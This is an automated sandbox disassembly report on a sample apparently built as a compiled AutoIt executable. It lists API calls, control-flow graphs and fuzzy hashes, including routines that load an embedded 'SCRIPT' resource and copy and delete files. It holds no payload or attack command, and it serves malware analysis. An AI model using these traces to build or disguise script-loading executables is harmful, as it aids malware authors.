                                                                    • GetSystemInfo.KERNEL32(?,006BDC38,?,?), ref: 0063DF35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                    • String ID:
                                                                    • API String ID: 3851250370-0
                                                                    • Opcode ID: b6c10673a70d468c55fae74ed379478889670d0f4d2e31a3d2aaadf59bf77732
                                                                    • Instruction ID: 458826be5da2c74bc9f4852f5c30db45011e0f0dcb06c9da34d7b5f8d5f23872
                                                                    • Opcode Fuzzy Hash: b6c10673a70d468c55fae74ed379478889670d0f4d2e31a3d2aaadf59bf77732
                                                                    • Instruction Fuzzy Hash: F76191B180A284DBCF15DF68A8C11E97FB66F29300F1985D9D8459F347C634CA09CBA5

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1422 62406b-624083 CreateStreamOnHGlobal 1423 6240a3-6240a6 1422->1423 1424 624085-62409c FindResourceExW 1422->1424 1425 6240a2 1424->1425 1426 694f16-694f25 LoadResource 1424->1426 1425->1423 1426->1425 1427 694f2b-694f39 SizeofResource 1426->1427 1427->1425 1428 694f3f-694f4a LockResource 1427->1428 1428->1425 1429 694f50-694f6e 1428->1429 1429->1425
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0062449E,?,?,00000000,00000001), ref: 0062407B
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0062449E,?,?,00000000,00000001), ref: 00624092
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,0062449E,?,?,00000000,00000001,?,?,?,?,?,?,006241FB), ref: 00694F1A
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,0062449E,?,?,00000000,00000001,?,?,?,?,?,?,006241FB), ref: 00694F2F
                                                                    • LockResource.KERNEL32(0062449E,?,?,0062449E,?,?,00000000,00000001,?,?,?,?,?,?,006241FB,00000000), ref: 00694F42
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: c0579e1b4a080ab5e601c2b6ff87d9a6e72777d736760f7ed5ca546cfb4020e5
                                                                    • Instruction ID: 9c5f596560515a5ea9a391b98e54479569db1af14582660fee2edca76868ca29
                                                                    • Opcode Fuzzy Hash: c0579e1b4a080ab5e601c2b6ff87d9a6e72777d736760f7ed5ca546cfb4020e5
                                                                    • Instruction Fuzzy Hash: E5112E71200711AFE7219B65EC48F677BBAEFC9B55F20416CF6029A650DB71ED40CA21
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00692F49), ref: 00666CB9
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00666CCA
                                                                    • FindClose.KERNEL32(00000000), ref: 00666CDA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: b654b90e9895c56c3d1125b26a52741c83d708bc890ad59f9caad825b121343a
                                                                    • Instruction ID: 5a0fdc50e46d3f1aa9c5c4e3100a1ce48acc0578107f431ae00349b5d63c47ed
                                                                    • Opcode Fuzzy Hash: b654b90e9895c56c3d1125b26a52741c83d708bc890ad59f9caad825b121343a
                                                                    • Instruction Fuzzy Hash: 28E012318149155783106738EC094E9766EDE06339B104716F576C16D0EB70AD448995
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: n
                                                                    • API String ID: 3964851224-3686792289
                                                                    • Opcode ID: fc13a66a601408e0cfd82501787700975bab063e87ebc6662e02f6400c225536
                                                                    • Instruction ID: e600b0bc1f4d14a9d480d63bf7a70cee6c3d812b0c32a4adfda0d58714dd627b
                                                                    • Opcode Fuzzy Hash: fc13a66a601408e0cfd82501787700975bab063e87ebc6662e02f6400c225536
                                                                    • Instruction Fuzzy Hash: 84927B706083519FDB64DF18C480B6AB7E6BF88304F14885DF89A8B362D775ED46CB92
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0062E959
                                                                    • timeGetTime.WINMM ref: 0062EBFA
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0062ED2E
                                                                    • TranslateMessage.USER32(?), ref: 0062ED3F
                                                                    • DispatchMessageW.USER32(?), ref: 0062ED4A
                                                                    • LockWindowUpdate.USER32(00000000), ref: 0062ED79
                                                                    • DestroyWindow.USER32 ref: 0062ED85
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062ED9F
                                                                    • Sleep.KERNEL32(0000000A), ref: 00695270
                                                                    • TranslateMessage.USER32(?), ref: 006959F7
                                                                    • DispatchMessageW.USER32(?), ref: 00695A05
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00695A19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                    • API String ID: 2641332412-570651680
                                                                    • Opcode ID: 0771733efe8ac8d4f61486f1ae97d670f852b93786a31b2394c864d90032bcc8
                                                                    • Instruction ID: f7ceb83e5d186cb9585b1e49dc1ef506f6b345d200917bcb7e24aec92506ec4d
                                                                    • Opcode Fuzzy Hash: 0771733efe8ac8d4f61486f1ae97d670f852b93786a31b2394c864d90032bcc8
                                                                    • Instruction Fuzzy Hash: 7E62D070508B90DFDB61DF24D885BAA77EBBF45304F08097DE9868B292DB71A844CF52
                                                                    APIs
                                                                    • ___createFile.LIBCMT ref: 00655EC3
                                                                    • ___createFile.LIBCMT ref: 00655F04
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00655F2D
                                                                    • __dosmaperr.LIBCMT ref: 00655F34
                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00655F47
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00655F6A
                                                                    • __dosmaperr.LIBCMT ref: 00655F73
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00655F7C
                                                                    • __set_osfhnd.LIBCMT ref: 00655FAC
                                                                    • __lseeki64_nolock.LIBCMT ref: 00656016
                                                                    • __close_nolock.LIBCMT ref: 0065603C
                                                                    • __chsize_nolock.LIBCMT ref: 0065606C
                                                                    • __lseeki64_nolock.LIBCMT ref: 0065607E
                                                                    • __lseeki64_nolock.LIBCMT ref: 00656176
                                                                    • __lseeki64_nolock.LIBCMT ref: 0065618B
                                                                    • __close_nolock.LIBCMT ref: 006561EB
                                                                      • Part of subcall function 0064EA9C: CloseHandle.KERNELBASE(00000000,006CEEF4,00000000,?,00656041,006CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0064EAEC
                                                                      • Part of subcall function 0064EA9C: GetLastError.KERNEL32(?,00656041,006CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0064EAF6
                                                                      • Part of subcall function 0064EA9C: __free_osfhnd.LIBCMT ref: 0064EB03
                                                                      • Part of subcall function 0064EA9C: __dosmaperr.LIBCMT ref: 0064EB25
                                                                      • Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E
                                                                    • __lseeki64_nolock.LIBCMT ref: 0065620D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00656342
                                                                    • ___createFile.LIBCMT ref: 00656361
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0065636E
                                                                    • __dosmaperr.LIBCMT ref: 00656375
                                                                    • __free_osfhnd.LIBCMT ref: 00656395
                                                                    • __invoke_watson.LIBCMT ref: 006563C3
                                                                    • __wsopen_helper.LIBCMT ref: 006563DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                    • String ID: @
                                                                    • API String ID: 3896587723-2766056989
                                                                    • Opcode ID: cf5a85734c11294fc0c98a8e94c1482a2fd9e8a86e5c68355ce3a3204a33f6b0
                                                                    • Instruction ID: e4c7b207e955d4d88ae49ec2e90ed5d9567078969c86b086cedb2b6c537bbd72
                                                                    • Opcode Fuzzy Hash: cf5a85734c11294fc0c98a8e94c1482a2fd9e8a86e5c68355ce3a3204a33f6b0
                                                                    • Instruction Fuzzy Hash: 472202719006059BEB259F68CC99BED7B73EF01326F644228FC229B3E2C6358D49CB55

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _wcscpy.LIBCMT ref: 0066FA96
                                                                    • _wcschr.LIBCMT ref: 0066FAA4
                                                                    • _wcscpy.LIBCMT ref: 0066FABB
                                                                    • _wcscat.LIBCMT ref: 0066FACA
                                                                    • _wcscat.LIBCMT ref: 0066FAE8
                                                                    • _wcscpy.LIBCMT ref: 0066FB09
                                                                    • __wsplitpath.LIBCMT ref: 0066FBE6
                                                                    • _wcscpy.LIBCMT ref: 0066FC0B
                                                                    • _wcscpy.LIBCMT ref: 0066FC1D
                                                                    • _wcscpy.LIBCMT ref: 0066FC32
                                                                    • _wcscat.LIBCMT ref: 0066FC47
                                                                    • _wcscat.LIBCMT ref: 0066FC59
                                                                    • _wcscat.LIBCMT ref: 0066FC6E
                                                                      • Part of subcall function 0066BFA4: _wcscmp.LIBCMT ref: 0066C03E
                                                                      • Part of subcall function 0066BFA4: __wsplitpath.LIBCMT ref: 0066C083
                                                                      • Part of subcall function 0066BFA4: _wcscpy.LIBCMT ref: 0066C096
                                                                      • Part of subcall function 0066BFA4: _wcscat.LIBCMT ref: 0066C0A9
                                                                      • Part of subcall function 0066BFA4: __wsplitpath.LIBCMT ref: 0066C0CE
                                                                      • Part of subcall function 0066BFA4: _wcscat.LIBCMT ref: 0066C0E4
                                                                      • Part of subcall function 0066BFA4: _wcscat.LIBCMT ref: 0066C0F7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$t2m
                                                                    • API String ID: 2955681530-3211479820
                                                                    • Opcode ID: 9045e3bd6ad853dd40094d6f0b4c861b9e57ea15f9900ab2848ddbc9f2d38d5a
                                                                    • Instruction ID: f2ef55b33da612ffe8428fe62591c010afb04802f5d3a5f2bdd9328807a3f5ba
                                                                    • Opcode Fuzzy Hash: 9045e3bd6ad853dd40094d6f0b4c861b9e57ea15f9900ab2848ddbc9f2d38d5a
                                                                    • Instruction Fuzzy Hash: B191A172504715AFDB60EF54D891E9BB3EABF84300F04482DF94997391DB30EA48CB9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 3074181302-0
                                                                    • Opcode ID: bf4070e2e2cd9bc1227edcde5a918865d340e174976e463d8261caede1d30f32
                                                                    • Instruction ID: e9a9407362cde69125478b6b0551740e3a4780ca29ad15895afb5def0dbd7fbe
                                                                    • Opcode Fuzzy Hash: bf4070e2e2cd9bc1227edcde5a918865d340e174976e463d8261caede1d30f32
                                                                    • Instruction Fuzzy Hash: B3321770E04285DFDB218FA8D880BED7BB3AF56314F24416AE8559F392C7709D42CBA1

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00623F86
                                                                    • RegisterClassExW.USER32(00000030), ref: 00623FB0
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00623FC1
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00623FDE
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00623FEE
                                                                    • LoadIconW.USER32(000000A9), ref: 00624004
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00624013
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: 82d85bd755b40f2a09b71930b4316aa2056ad0557fb6f88e40a49c5eff350772
                                                                    • Instruction ID: 2c2f1861fe858d7cd94d6538fb07b80ddb4e20573442172caa562c7d8b8591af
                                                                    • Opcode Fuzzy Hash: 82d85bd755b40f2a09b71930b4316aa2056ad0557fb6f88e40a49c5eff350772
                                                                    • Instruction Fuzzy Hash: 2621D8B5D00359AFDB00EFA4EC89BCDBBB6FB0A700F10611AF611AA2A0D7B55544DF91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1073 66bfa4-66c054 call 64f8a0 call 63f4ea call 6247b7 call 66bdb4 call 624517 call 6415e3 1086 66c107-66c10e call 66c56d 1073->1086 1087 66c05a-66c061 call 66c56d 1073->1087 1092 66c117 1086->1092 1093 66c110-66c112 1086->1093 1087->1093 1094 66c067-66c105 call 641dfc call 640d23 call 640cf4 call 641dfc call 640cf4 * 2 1087->1094 1097 66c11a-66c1d6 call 6244ed * 8 call 66c71a call 643499 1092->1097 1095 66c367-66c368 1093->1095 1094->1097 1100 66c385-66c393 call 6247e2 1095->1100 1132 66c1df-66c1fa call 66bdf8 1097->1132 1133 66c1d8-66c1da 1097->1133 1136 66c200-66c208 1132->1136 1137 66c28c-66c298 call 6435e4 1132->1137 1133->1095 1138 66c210 1136->1138 1139 66c20a-66c20e 1136->1139 1144 66c2ae-66c2b2 1137->1144 1145 66c29a-66c2a9 DeleteFileW 1137->1145 1141 66c215-66c233 call 6244ed 1138->1141 1139->1141 1149 66c235-66c23b 1141->1149 1150 66c25d-66c273 call 66b791 call 642aae 1141->1150 1146 66c342-66c356 CopyFileW 1144->1146 1147 66c2b8-66c32f call 66c81d call 66c845 call 66b965 1144->1147 1145->1095 1152 66c36a-66c380 DeleteFileW call 66c6d9 1146->1152 1153 66c358-66c365 DeleteFileW 1146->1153 1147->1152 1169 66c331-66c340 DeleteFileW 1147->1169 1154 66c23d-66c250 call 66bf2e 1149->1154 1166 66c278-66c283 1150->1166 1152->1100 1153->1095 1164 66c252-66c25b 1154->1164 1164->1150 1166->1136 1168 66c289 1166->1168 1168->1137 1169->1095
                                                                    APIs
                                                                      • Part of subcall function 0066BDB4: __time64.LIBCMT ref: 0066BDBE
                                                                      • Part of subcall function 00624517: _fseek.LIBCMT ref: 0062452F
                                                                    • __wsplitpath.LIBCMT ref: 0066C083
                                                                      • Part of subcall function 00641DFC: __wsplitpath_helper.LIBCMT ref: 00641E3C
                                                                    • _wcscpy.LIBCMT ref: 0066C096
                                                                    • _wcscat.LIBCMT ref: 0066C0A9
                                                                    • __wsplitpath.LIBCMT ref: 0066C0CE
                                                                    • _wcscat.LIBCMT ref: 0066C0E4
                                                                    • _wcscat.LIBCMT ref: 0066C0F7
                                                                    • _wcscmp.LIBCMT ref: 0066C03E
                                                                      • Part of subcall function 0066C56D: _wcscmp.LIBCMT ref: 0066C65D
                                                                      • Part of subcall function 0066C56D: _wcscmp.LIBCMT ref: 0066C670
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0066C2A1
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0066C338
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0066C34E
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0066C35F
                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0066C371
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 2378138488-0
                                                                    • Opcode ID: 6416944bcf151c0552f407b67668a1e9fe6de30d73a6c3b6e8e56ac4bc103185
                                                                    • Instruction ID: bb13b131c3c0d305c62aeab84568321c84c21888fda1bfb8c02a226685779e4b
                                                                    • Opcode Fuzzy Hash: 6416944bcf151c0552f407b67668a1e9fe6de30d73a6c3b6e8e56ac4bc103185
                                                                    • Instruction Fuzzy Hash: E7C12EB1E00129ABDF51DF95CC81EEEB7BEEF45310F1040AAF649E6251DB309A448F65

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1170 623742-623762 1172 6237c2-6237c4 1170->1172 1173 623764-623767 1170->1173 1172->1173 1176 6237c6 1172->1176 1174 6237c8 1173->1174 1175 623769-623770 1173->1175 1180 691e00-691e2e call 622ff6 call 63e312 1174->1180 1181 6237ce-6237d1 1174->1181 1177 623776-62377b 1175->1177 1178 62382c-623834 PostQuitMessage 1175->1178 1179 6237ab-6237b3 DefWindowProcW 1176->1179 1183 691e88-691e9c call 664ddd 1177->1183 1184 623781-623783 1177->1184 1185 6237f2-6237f4 1178->1185 1186 6237b9-6237bf 1179->1186 1216 691e33-691e3a 1180->1216 1187 6237d3-6237d4 1181->1187 1188 6237f6-62381d SetTimer RegisterWindowMessageW 1181->1188 1183->1185 1209 691ea2 1183->1209 1192 623836-623840 call 63eb83 1184->1192 1193 623789-62378e 1184->1193 1185->1186 1189 6237da-6237ed KillTimer call 623847 call 62390f 1187->1189 1190 691da3-691da6 1187->1190 1188->1185 1194 62381f-62382a CreatePopupMenu 1188->1194 1189->1185 1202 691da8-691daa 1190->1202 1203 691ddc-691dfb MoveWindow 1190->1203 1210 623845 1192->1210 1198 691e6d-691e74 1193->1198 1199 623794-623799 1193->1199 1194->1185 1198->1179 1205 691e7a-691e83 call 65a5f3 1198->1205 1207 691e58-691e68 call 6655bd 1199->1207 1208 62379f-6237a5 1199->1208 1211 691dcb-691dd7 SetFocus 1202->1211 1212 691dac-691daf 1202->1212 1203->1185 1205->1179 1207->1185 1208->1179 1208->1216 1209->1179 1210->1185 1211->1185 1212->1208 1217 691db5-691dc6 call 622ff6 1212->1217 1216->1179 1220 691e40-691e53 call 623847 call 624ffc 1216->1220 1217->1185 1220->1179
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 006237B3
                                                                    • KillTimer.USER32(?,00000001), ref: 006237DD
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00623800
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0062380B
                                                                    • CreatePopupMenu.USER32 ref: 0062381F
                                                                    • PostQuitMessage.USER32(00000000), ref: 0062382E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: a0c0f96c442f333dc4edbe747801da4d12c723a6463014b545659eaf1c6f7c90
                                                                    • Instruction ID: ba408cd25ecafa75176040ba5b81d1104d8606fc83e9b1c1822301e13fc485f3
                                                                    • Opcode Fuzzy Hash: a0c0f96c442f333dc4edbe747801da4d12c723a6463014b545659eaf1c6f7c90
                                                                    • Instruction Fuzzy Hash: 5A4119F1114AB6A7DF146F28BC49BF9365BFB02300F101119F9029E790DB799E41AF69

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00623E79
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00623E88
                                                                    • LoadIconW.USER32(00000063), ref: 00623E9E
                                                                    • LoadIconW.USER32(000000A4), ref: 00623EB0
                                                                    • LoadIconW.USER32(000000A2), ref: 00623EC2
                                                                      • Part of subcall function 00624024: LoadImageW.USER32(00620000,00000063,00000001,00000010,00000010,00000000), ref: 00624048
                                                                    • RegisterClassExW.USER32(?), ref: 00623F30
                                                                      • Part of subcall function 00623F53: GetSysColorBrush.USER32(0000000F), ref: 00623F86
